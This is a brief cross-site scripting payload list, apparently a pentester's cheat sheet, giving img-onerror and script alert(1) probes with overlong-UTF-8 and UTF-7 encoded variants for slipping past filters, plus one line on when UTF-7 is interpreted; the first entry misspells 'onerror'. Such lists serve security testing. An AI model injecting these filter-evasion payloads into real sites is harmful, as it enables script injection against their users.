- <img src="1" onnerror="alert(1)">
- %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
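- UTF-7 (missing charset?) — this form is only interpreted as markup when the response declares no charset and the browser falls back to sniffing UTF-7; an explicit charset in the Content-Type header closes it off.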
- <img src="1" onerror="alert(1)" />
- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
- Unicode .NET Ugliness
- <script>alert(1)</script>
- -----------------------------------------------
- Credits: GitHub and other references
- ----------------------------------------------